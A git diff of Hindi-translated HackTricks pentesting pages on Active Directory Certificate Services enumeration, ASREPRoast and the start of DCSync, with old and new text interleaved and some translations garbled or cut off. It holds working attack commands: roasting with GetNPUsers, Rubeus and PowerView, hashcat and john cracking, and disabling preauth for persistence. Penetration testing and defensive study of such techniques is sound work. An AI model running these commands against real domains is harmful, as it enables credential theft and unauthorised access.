* एक **certificateTemplates** फील्ड जो **सक्षम प्रमाणपत्र टेम्पलेट्स** को परिभाषित करती है। प्रमाणपत्र टेम्पलेट्स एक "ब्लूप्रिंट" होते हैं जिसका उपयोग CA प्रमाणपत्र बनाते समय करता है, और इसमें EKUs, नामांकन अनुमतियां, प्रमाणपत्र की समाप्ति, जारी करने की आवश्यकताएं, और क्रिप्टोग्राफी सेटिंग्स जैसी चीजें शामिल होती हैं। हम बाद में प्रमाणपत्र टेम्पलेट्स के बारे में और विस्तार से चर्चा करेंगे।
`CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<domain>,DC=<com>`
{% hint style="info" %}
AD वातावरणों में, **क्लाइंट्स Enterprise CAs से प्रमाणपत्र का अनुरोध करने के लिए इंटरैक्ट करते हैं** जो एक प्रमाणपत्र टेम्पलेट में परिभाषित सेटिंग्स के आधार पर होता है। Enterprise CA प्रमाणपत्रों को प्रत्येक Windows मशीन पर Intermediate Certification Authorities प्रमाणपत्र स्टोर में प्रसारित किया जाता है।
{% endhint %}
एडी प्रमाण पत्र टेम्पलेट ऑब्जेक्ट की विशेषताएं **इसकी सेटिंग्स को परिभाषित करती हैं, और इसकी सुरक्षा विवरणावली नियंत्रित करती है** कि कौन से **प्रमुख उम्मीदवार प्रमाण पत्र के लिए पंजीकरण कर सकते हैं** या प्रमाण पत्र को **संपादित** कर सकते हैं।
एडी प्रमाण पत्र टेम्पलेट ऑब्जेक्ट पर **`pKIExtendedKeyUsage`** विशेषता में एक **OID का एक एरे** होता है जो टेम्पलेट में सक्षम होते हैं। ये EKU OIDs प्रमाण पत्र के उपयोग के लिए **क्या किया जा सकता है** पर प्रभाव डालते हैं। आप यहां [संभावित OIDs की सूची पा सकते हैं](https://www.pkisolutions.com/object-identifiers-oid-in-pki/)।
#### प्रमाणीकरण OIDs
* `1.3.6.1.5.5.7.3.2`: क्लाइंट प्रमाणीकरण
* `1.3.6.1.5.2.3.4`: PKINIT क्लाइंट प्रमाणीकरण (म
### जारी करने की आवश्यकताएं
प्रमाणपत्र प्राप्त करने के लिए कैसे नियंत्रण किए जा सकते हैं, इसके लिए अन्य आवश्यकताएं हो सकती हैं।
#### प्रबंधक स्वीकृति
**CA प्रमाणपत्र प्रबंधक स्वीकृति** प्रमाणपत्र टेम्पलेट को सेट करती है जिससे AD ऑब्जेक्ट के `msPKI-EnrollmentFlag` एट्रिब्यूट पर `CT_FLAG_PEND_ALL_REQUESTS` (0x2) बिट आता है। इससे टेम्पलेट पर आधारित सभी **प्रमाणपत्र अनुरोध** को **पेंडिंग स्थिति** में रख दिया जाता है (जो `certsrv.msc` में "पेंडिंग अनुरोध" खंड में दिखाई देता है) जिससे प्रमाणपत्र प्रबंधक को अनुरोध को **स्वीकृति या अस्वीकृति** करने की आवश्यकता होती है:
<figure><img src="../../.gitbook/assets/image (13) (2).png" alt=""><figcaption></figcaption></figure>
#### नामांकन एजेंट, अधिकृत हस्ताक्षर और आवेदन नीतियाँ
**अधिकृत हस्ताक्षरों की संख्या** और **आवेदन नीति**। पहला निर्धारित करता है कि CA इसे स्वीकार करने के लिए CSR में **हस्ताक्षरों की संख्या** को निर्धारित करता है। दूसरा निर्धारित करता है कि CSR साइन करने वाले प्रमाणपत्र में होने चाहिए **EKU OIDs** को।
इन सेटिंग्स का एक सामान्य उपयोग **नामांकन एजेंटों** के लिए होता है। नामांकन एजेंट एक AD CS शब्द है जिसे एक ऐसे संगठन को दिया जाता है जो दूसरे उपयोगकर्ता के लिए प्रमाणपत्र का अनुरोध कर सकता है। इसके लिए, CA को नामांकन एजेंट खाते को कम से कम **प्रमाणपत्र अनुरोध एजेंट EKU** (OID 1.3.6.1.4.1.311.20.2.1) को समेत करने वाला प्रमाणपत्र जारी करना होगा। जैसे ही जारी हो जाता है, नामांकन एजेंट दूसरे उपयोगकर्ताओं के लिए CSR को साइन कर सकता है और प्रमाणपत्र का अनुरोध कर सकता है। CA केवल निम्नलिखित गैर-सम्पूर्ण सेट के शर्तों के तहत नामांकन एजेंट को प्रमाणपत्र के रूप में एक और उपयोगकर्ता के रूप में जारी करेगा (मुख्य रूप से डिफ़ॉल्ट नीति मॉड्यूल `certpdef.dll` में लागू की गई है):
* CA को लक्ष्य प्रमाणपत्र टेम्पलेट के लिए नामांकन अधिकार होने वाले Windows उपयोगकर्ता को प्रमाणित करने के लिए।
* यदि प्रमाणपत्र टेम्पलेट का स्कीमा संस्करण 1 है, तो CA को प्रमाणपत्र जारी करने से पहले प्रमाणपत्र साइन करने वाले प्रमाणपत्र में प्रमाणपत्र अनुरोध एजेंट OID होना चाहिए। टेम्पलेट का स्कीमा संस्करण उसके AD ऑब्जेक्ट के msPKI-Template-Schema-Version प्रॉपर्टी में निर्दिष्ट किया जाता है।
* यदि प्रमाणपत्र टेम्पलेट का स्कीमा संस्करण 2 है:
* टेम्पलेट को "इस अधिकृत हस्ताक्षरों की संख्या" सेट करनी होगी और निर्दिष्ट संख्या के नामांकन एजेंटों को CSR पर हस्ताक्षर करने होंगे (टेम्पलेट के mspkira-signature AD एट्रिब्यूट ने इस सेटिंग को परिभाषित किया है)। दूसरे शब्दों में, यह सेटिंग निर्धारित करती है कि CA को प्रमाणपत्र जारी करने से पहले कितने नामांकन एजेंटों को CSR पर हस्ताक्षर करने होंगे।
* टेम्पलेट की "आवेदन नीति" जारी करने की प्रतिबंधन निर्धारित करनी होगी "प्रमाणपत्र अनुरोध एजेंट" के रूप में।
### प्रमाणपत्र अनुरोध
1. Windows **Client Certificate Enrolment Protocol** (MS-WCCE) का उपयोग करके, जो विभिन्न AD CS सुविधाओं के साथ संवाद करने वाले वितरित संघटन
### सुरक्षित चैनल (Schannel) प्रमाणीकरण
Schannel एक सुरक्षा समर्थन प्रदाता (SSP) है जिसे Windows TLS/SSL कनेक्शन स्थापित करते समय उपयोग करता है। Schannel **क्लाइंट प्रमाणीकरण** (अन्य क्षमताओं के बीच) का समर्थन करता है, जिससे एक दूरस्थ सर्वर को **जुड़ते उपयोगकर्ता की पहचान सत्यापित** करने की सुविधा मिलती है। यह प्रमाणीकरण प्रमाण के रूप में प्रमुखता प्रमाण पत्रों का उपयोग करके PKI का उपयोग करके इसे प्राप्त करता है।\
**TLS हैंडशेक** के दौरान, सर्वर **प्रमाण पत्र का अनुरोध करता है** उपयोगकर्ता की प्रमाणीकरण के लिए। पहले से ही सर्वर द्वारा विश्वसनीयता प्रमाण पत्र प्रदान किए जाने के बाद, क्लाइंट अपना प्रमाण पत्र सर्वर को भेजता है। सर्वर फिर प्रमाण पत्र को सत्यापित करता है कि यह सही है और सब कुछ ठीक होने की स्थिति में उपयोगकर्ता को पहुंच प्रदान करता है।
<figure><img src="../../.gitbook/assets/image (8) (2) (1).png" alt=""><figcaption></figcaption></figure>
जब एक खाता प्रमाणीकरण पत्र का उपयोग करके AD में प्रमाणित होता है, तो DC को किसी तरह से प्रमाण पत्र प्रमाण को AD खाते से मैप करने की आवश्यकता होती है। **Schannel** पहले **Kerberos के S4U2Self** कार्यक्षमता का उपयोग करके **प्रमाण पत्र** को **उपयोगकर्ता** खाते से मैप करने का प्रयास करता है।\
यदि यह **सफल नहीं होता** है, तो यह **प्रमाण पत्र को उपयोगकर्ता** खाते से मैप करने का प्रयास करेगा, प्रमाण पत्र के **SAN एक्सटेंशन**, विषय और जारीकर्ता क्षेत्रों का संयोजन, या केवल जारीकर्ता से। डिफ़ॉल्ट रूप से, AD परिवेशों में कई प्रोटोकॉल Schannel का समर्थन करके AD प्रमाणीकरण का समर्थन नहीं करते हैं। WinRM, RDP, और IIS सभी Schannel का उपयोग करके क्लाइंट प्रमाणीकरण का समर्थन करते हैं, लेकिन इसके लिए **अतिरिक्त कॉन्फ़िगरेशन की आवश्यकता होती है**, और कुछ मामलों में - जैसे WinRM - सक्रिय निर्देशिका के साथ एकीकरण नहीं करता है।\
एक प्रोटोकॉल जो आमतौर पर काम करता है - माना जाता है कि AD CS सेटअप किया गया है - है **LDAPS**। कमांडलाइन उपकरण `Get-LdapCurrentUser` दिखाता है कि कैसे .NET पुस्तकालयों का उपयोग करके LDAP में प्रमाणित होने के लिए प्रमाणित हो सकता है। यह कमांडलाइन उपकरण वर्तमान में प्रमाणित हो रहे उपयोगकर्ता को प्रदर्शित करने के लिए LDAP "मैं कौन हूँ?" विस्तारित प्रक्रिया का निष्पादन करता है:
<figure><img src="../../.gitbook/assets/image (2) (4).png" alt=""><figcaption></figcaption></figure>
## AD CS जाँच
AD के लिए जैसे ही, अब तक शामिल सभी जानकारी को डोमेन प्रमाणित, लेकिन अनुप्रयोगित उपयोगकर्ता के रूप में LDAP क्वेरी करके उपलब्ध किया जा सकता है।
यदि हम **एंटरप्राइज CAs** और उनकी सेटिंग्स की जाँच करना चाहते हैं, तो हम `CN=Configuration,DC=<domain>,DC=<com>` खोज आधार पर `(objectCategory=pKIEnrollmentService)` LDAP फ़िल्टर का उपयोग करके LDAP क्वेरी कर सकते हैं (यह खोज आधार AD वनस्पति के विन्यास नामांकन संदर्भ से मेल खाता है)। परिणामों में CA सर्वर के DNS होस्टनाम, CA नाम इसी तरह प्रमाण पत्र प्रारंभ और समाप्ति तिथियाँ, विभिन्न ध्वज, प्रकाशित प्रमाण पत्र टेम्पलेट, और अधिक शामिल होंगे।
**विकल्पी उपकरण जो विकल्पी प्रमाण पत्रों की जाँच कर सकते हैं:**
* [**Certify**](https://github.com/GhostPack/Certify) एक C# उपकरण है जो **AD CS पर्यावरण के बारे में उपयोगी विन्यास और अवयव सूचना की जाँच कर सकता है** और विभिन्न तरीकों से प्रमाण पत्र अनुरोध कर सकता है।
* [**Certipy**](https://github.com/ly4k/Certipy) एक **python** उपकरण है जो किसी भी सिस्टम से (DC तक पहुंच वाले) **Active Directory Certificate Services (AD CS)** की **जाँच और दुरुपयोग** करने के लिए सक्षम है जो BloodHound के लिए उत्पन्न कर सकता है जिसे [**Lyak**](https://twitter.com/ly4k\_) ने बनाया है (अच्छा व्यक्ति बेहतर हैकर)।
* **NTAuthCertificates** AD ऑब
```bash
# https://github.com/GhostPack/Certify
Certify.exe cas #enumerate trusted root CA certificates, certificates defined by the NTAuthCertificates object, and various information about Enterprise CAs
@ -127,12 +77,14 @@ certutil -v -dstemplate #enumerate certificate templates
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह!
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा संग्रह विशेष [**NFTs**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में शामिल हों या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
</details>

88
windows-hardening/active-directory-methodology/asreproast.md
View file

@ -2,55 +2,59 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**टेलीग्राम समूह**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof सभी क्रिप्टो बग बाउंटी के लिए घर है।**
[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) सर्वर में शामिल हों और अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!
**देरी के बिना पुरस्कार प्राप्त करें**\
HackenProof बाउंटी केवल तब शुरू होती हैं जब उनके ग्राहक इनाम बजट जमा करते हैं। आपको इनाम उस बग को सत्यापित करने के बाद मिलेगा।
**हैकिंग इनसाइट्स**\
हैकिंग के रोमांच और चुनौतियों के बारे में गहराई से जानकारी प्राप्त करें
**वेब3 पेंटेस्टिंग में अनुभव प्राप्त करें**\
ब्लॉकचेन प्रोटोकॉल और स्मार्ट कॉन्ट्रैक्ट्स नई इंटरनेट हैं! उनके उभरते दिनों में वेब3 सुरक्षा को मास्टर करें।
**रियल-टाइम हैक न्यूज**\
रियल-टाइम न्यूज और इनसाइट्स के माध्यम से हैकिंग की तेजी से बदलती दुनिया के साथ अपडेट रहें
**वेब3 हैकर लीजेंड बनें**\
प्रत्येक सत्यापित बग के साथ प्रतिष्ठा अंक प्राप्त करें और साप्ताहिक लीडरबोर्ड के शीर्ष पर विजयी बनें।
**नवीनतम घोषणाएँ**\
नवीनतम बग बाउंटीज लॉन्चिंग और महत्वपूर्ण प्लेटफॉर्म अपडेट्स के साथ सूचित रहें
[**HackenProof पर साइन अप करें**](https://hackenproof.com/register) और अपने हैक्स से कमाई करें!
{% embed url="https://hackenproof.com/register" %}
[**Discord**](https://discord.com/invite/N3FrSbmwdy) पर हमसे जुड़ें और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!
## ASREPRoast
ASREPRoast हमला **Kerberos पूर्व-प्रमाणीकरण आवश्यक विशेषता वाले उपयोगकर्ताओं** की खोज करता है।
ASREPRoast हमला **उन उपयोगकर्ताओं की खोज करता है जिनके पास Kerberos प्री-प्रमाणीकरण आवश्यक विशेषता नहीं है (**[_**DONT_REQ_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**)**_.
इसका मतलब है कि कोई भी उपयोगकर्ता AS\_REQ अनुरोध को DC को भेज सकता है उन उपयोगकर्ताओं के नाम पर और AS\_REP संदेश प्राप्त कर सकता है। इस अंतिम प्रकार का संदेश मूल उपयोगकर्ता कुंजी के साथ एन्क्रिप्ट किए गए डेटा का टुकड़ा होता है, जो उसके पासवर्ड से प्राप्त होता है। इसके बाद, इस संदेश का उपयोग करके, उपयोगकर्ता का पासवर्ड ऑफलाइन क्रैक किया जा सकता है।
इसका मतलब है कि कोई भी उन उपयोगकर्ताओं में से किसी की ओर से DC को AS_REQ अनुरोध भेज सकता है, और AS_REP संदेश प्राप्त कर सकता है। यह अंतिम प्रकार का संदेश एक डेटा चंक होता है जो मूल उपयोगकर्ता की कुंजी से एन्क्रिप्टेड होता है, जो उसके पासवर्ड से निकाला गया होता है। फिर, इस संदेश का उपयोग करके, उपयोगकर्ता का पासवर्ड ऑफलाइन क्रैक किया जा सकता है।
इसके अलावा, **इस हमले को करने के लिए कोई डोमेन खाता की आवश्यकता नहीं होती है**, केवल DC से कनेक्शन होनी चाहिए। हालांकि, **डोमेन खाता के साथ**, डोमेन में **Kerberos पूर्व-प्रमाणीकरण वाले उपयोगकर्ताओं को प्राप्त करने के लिए LDAP क्वेरी** का उपयोग किया जा सकता है। **अन्यथा उपयोगकर्ता नामों को अनुमान लगाना होगा**।
इसके अलावा, इस हमले को करने के लिए **किसी डोमेन खाते की आवश्यकता नहीं होती**, केवल DC से कनेक्शन की जरूरत होती है। हालांकि, **एक डोमेन खाते के साथ**, LDAP क्वेरी का उपयोग करके **डोमेन में Kerberos प्री-प्रमाणीकरण के बिना उपयोगकर्ताओं को पुनः प्राप्त किया जा सकता है****अन्यथा उपयोगकर्ता नामों का अनुमान लगाना होगा**।
#### विकल्पी रूप से विकल्पी उपयोगकर्ताओं की गणना करना (डोमेन क्रेडेंशियल की आवश्यकता होती है)
#### संवेदनशील उपयोगकर्ताओं का अनुक्रमण (डोमेन क्रेडेंशियल्स की आवश्यकता)
```bash
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
```
#### AS\_REP संदेश का अनुरोध करें
{% code title="लिनक्स का उपयोग करके" %}
{% code title="लिनक्स का उपयोग करते हुए" %}
```bash
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
```
{% code title="Windows का उपयोग करें" %}
```
{% endcode %}
{% code title="विंडोज का उपयोग करते हुए" %}
```
```bash
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
@ -58,7 +62,7 @@ Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github
{% endcode %}
{% hint style="warning" %}
AS-REP Roasting के साथ Rubeus का उपयोग करने से 0x17 एन्क्रिप्शन प्रकार और 0 पूर्व प्रमाणीकरण प्रकार के साथ 4768 उत्पन्न होगा।
Rubeus के साथ AS-REP Roasting करने पर एक 4768 इवेंट जेनरेट होगा जिसका एन्क्रिप्शन टाइप 0x17 होगा और प्रीऑथ टाइप 0 होगा।
{% endhint %}
### क्रैकिंग
@ -66,41 +70,41 @@ AS-REP Roasting के साथ Rubeus का उपयोग करने स
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
```
### स्थिरता
### स्थायित्व
उन उपयोगकर्ता के लिए **पूर्व-प्रमाणीकरण** अनिवार्य नहीं करें जिनके पास आपके पास **सामान्य सभी** अनुमतियाँ हैं (या गुणों को लिखने की अनुमति है):
जहां आपके पास **GenericAll** अनुमतियां हों (या गुण लिखने की अनुमतियां हों), वहां उपयोगकर्ता के लिए **preauth** आवश्यक नहीं होने के लिए बल दें:
```bash
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
```
## संदर्भ
[**AS-RRP Roasting के बारे में अधिक जानकारी ired.team पर**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
[**AS-REP Roasting के बारे में अधिक जानकारी ired.team में**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof क्रिप्टो बग बाउंटी के लिए घर है।**
अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करने के लिए [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) सर्वर में शामिल हों!
**देरी के बिना पुरस्कार प्राप्त करें**\
HackenProof बाउंटी केवल तब शुरू होती हैं जब उनके ग्राहक इनाम बजट जमा करते हैं। आपको इनाम उस बग के सत्यापन के बाद मिलेगा।
**हैकिंग अंतर्दृष्टि**\
हैकिंग के रोमांच और चुनौतियों पर गहराई से जानकारी प्राप्त करें
**वेब3 पेंटेस्टिंग में अनुभव प्राप्त करें**\
ब्लॉकचेन प्रोटोकॉल और स्मार्ट कॉन्ट्रैक्ट्स नई इंटरनेट हैं! उनके उभरते दिनों में वेब3 सुरक्षा को मास्टर करें।
**रियल-टाइम हैक समाचार**\
रियल-टाइम समाचार और अंतर्दृष्टि के माध्यम से हैकिंग दुनिया के साथ अद्यतन रहें
**वेब3 हैकर लीजेंड बनें**\
प्रत्येक सत्यापित बग के साथ प्रतिष्ठा अंक प्राप्त करें और साप्ताहिक लीडरबोर्ड के शीर्ष पर विजयी बनें।
**नवीनतम घोषणाएँ**\
नवीनतम बग बाउंटीज के लॉन्च और महत्वपूर्ण प्लेटफॉर्म अपडेट्स के साथ सूचित रहें
[**HackenProof पर साइन अप करें**](https://hackenproof.com/register) और अपने हैक्स से कमाई करें!
{% embed url="https://hackenproof.com/register" %}
[**Discord**](https://discord.com/invite/N3FrSbmwdy) पर हमसे जुड़ें और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी में काम करते हैं**? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें**।**
* **अपने हैकिंग ट्रिक्स को हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपने हैकिंग ट्रिक्स साझा करें।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) या [**telegram group**](https://t.me/peass) में **शामिल हों** या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>

122
windows-hardening/active-directory-methodology/dcsync.md
View file

@ -1,120 +1,80 @@
# DCSync
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और आसानी से वर्ल्ड के सबसे उन्नत सामुदायिक उपकरणों द्वारा संचालित **ऑटोमेटिक वर्कफ़्लो** बनाएं।\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करके दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित **वर्कफ्लो को आसानी से बनाएं और स्वचालित करें**।\
आज ही पहुंच प्राप्त करें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ AWS हैकिंग सीखें शून्य से नायक तक</strong></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित** की जाए? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की सुविधा** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
